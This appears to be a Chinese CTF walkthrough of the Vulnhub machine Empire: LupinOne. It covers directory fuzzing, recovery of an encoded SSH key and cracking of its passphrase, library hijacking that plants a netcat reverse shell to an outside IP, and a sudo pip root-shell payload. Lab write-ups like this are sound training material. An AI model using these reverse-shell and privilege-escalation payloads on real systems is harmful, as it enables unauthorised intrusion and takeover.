Vulnhub | Empire | LUPINONE

写在前面

比较有名的靶机,赶紧来试试。

官方链接:https://www.vulnhub.com/entry/empire-lupinone,750/

总体来说难度一般,从出题来说并不算很出色。

信息搜集

对目标进行端口扫描并识别指纹,开启端口为8022
在这里插入图片描述
80看看,表面没什么东西
在这里插入图片描述
查看源代码,没什么东西,有个小小的提示

Its an easy box, but dont give up.

在这里插入图片描述
只能先扫描试试,这里使用的dirsearch,有一定的收获
在这里插入图片描述

robots.txt

查看扫到的robots.txt,指向下一个目标
在这里插入图片描述
进去没什么东西,有一个提示

you can do it, keep trying.

暂时先放放吧
在这里插入图片描述

manual/index.html

上面路径扫描还有一个这个结果,打开后是apache的文档
在这里插入图片描述
版本已经暴露
在这里插入图片描述
查询该版本nday,在它的高一个版本有RCE,当前版本有一个SSRF,详情可以搜索一下。

我都尝试复现和payload,但是未存在符合漏洞的目录或相关组件,复现失败
在这里插入图片描述
Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)

FUZZ突破

在前面的提示中写到keep trying.. ,很有可能就是从那个点继续突破,但是本身页面没有什么深挖的地方。

仔细观察url 路径为/~myfiles/

对这个点进行FUZZ尝试
在这里插入图片描述
选择字典可以直接使用bp自带的Directories FUZZ
在这里插入图片描述
开始爆破,找到名为secret的路径
在这里插入图片描述
进去看看,是一段话
在这里插入图片描述
翻译如下:

你好朋友,我很高兴你找到了我的秘密目录,我这样创建是为了与你分享我创建的 ssh 私钥文件,
它隐藏在这里的某个地方,这样黑客就不会找到它并用快速通道破解我的密码。
我很聪明我知道。
有什么问题告诉我
你最好的朋友icex64

这里继续提示到,“它隐藏在这里的某个地方”,那么就要从这里找了,但是本身页面非常简单,没有什么值得深挖的点。

只能再次用前面的思路,进行FUZZ。如果你熟悉ssh在服务器上的情况,那么你一定知道,它保存在 /root/.ssh中。所以这里猜测是形似.ssh的路径。这也是出题的小瑕疵,如果想不到这个点,很难进一步突破,爆破和字典有关,很有运气成分。这里也是看了网友们的思路。

.后面的值进行FUZZ
在这里插入图片描述
github上找了个大的字典,增加爆破准确度

在这里插入图片描述
找到了名为mysecret.txt的文件
在这里插入图片描述
打开是一个base58为特征的密文(因为全局没有0),如果你不知道base系列特征,可以看下面的链接

base系列特征:https://blog.csdn.net/weixin_43326436/article/details/126242443
在这里插入图片描述
在网上找一个解密
在这里插入图片描述
明显这就是一个ssh密钥文件
在这里插入图片描述

登录服务器

尝试xshell连接
在这里插入图片描述
对于用户名,在前面的提示中已经提到
your best friend icex64
在这里插入图片描述
在这里插入图片描述
并不能连接,用终端试了一下也是
在这里插入图片描述
可以明显看到,需要一个密码,说明这是加了密的。正好对应了前面的提示
its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack

这也正好说了,要使用fasttrack去破解它

首先先转换当前密钥文件为待破解形式,然后指定kali自带的fasttrack字典去破解它,找到密码为:
P@55w0rd!
在这里插入图片描述
使用该密码登录,成功
在这里插入图片描述
当前目录下存在flag文件
在这里插入图片描述

尝试提权

尝试常规suidsudo -l提权,发现有一个arsene用户的heist.py脚本
在这里插入图片描述
查看一下有些什么

发现在该目录除了该脚本,还有一个txt文本,打开看看
在这里插入图片描述
翻译如下:

Can you please help check if my code is secure to run, I need to use for my next heist.

I dont want to anyone else get inside it, because it can compromise my account and find my secret file.

Only you have access to my program, because I know that your account is secure.

See you on the other side.

你能帮我检查一下我的代码是否可以安全运行吗?我需要在下次抢劫时使用。
我不想让其他人进入它,因为它会泄露我的帐户并找到我的秘密文件。
只有你可以访问我的程序,因为我知道你的帐户是安全的。
在另一边见。

看看脚本,脚本内容非常简单,导入了一个库,调用了一个open方法。
在这里插入图片描述
查一下这个库的位置,找到了
在这里插入图片描述
查看该脚本权限,是有可写权限的
在这里插入图片描述
直接看open方法就可以了,直接将其他东西注释掉,由于该脚本引用了os库,直接命令执行,反弹shell
os.system("nc 192.168.169.115 10050 -c /bin/bash")
在这里插入图片描述
记得用arsene用户执行该脚本,可以看到登录arsene用户成功
在这里插入图片描述

PIP提权

仍然查suid文件,sudo -l 文件

这里可以看到pip是可以无密码以root权限使用的
在这里插入图片描述
python转一下终端到bash
在这里插入图片描述
pip提权poc为:

TF=$(mktemp -d)

echo "import os; os.execl('/bin/sh','sh','-c','sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

sudo pip install $TF

简单解释一下这个pocmktemp命令可以在/tmp目录下创建一个临时的文件或文件夹,这里使用了-d参数,所以是临时文件夹(TF以变量形式,指代该临时文件夹)。第二条是以os库给出sh终端,写在该临时文件夹的setup.py下。最后pip install,会定位到setup.py

如下图所示
在这里插入图片描述
最后在root目录下找到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值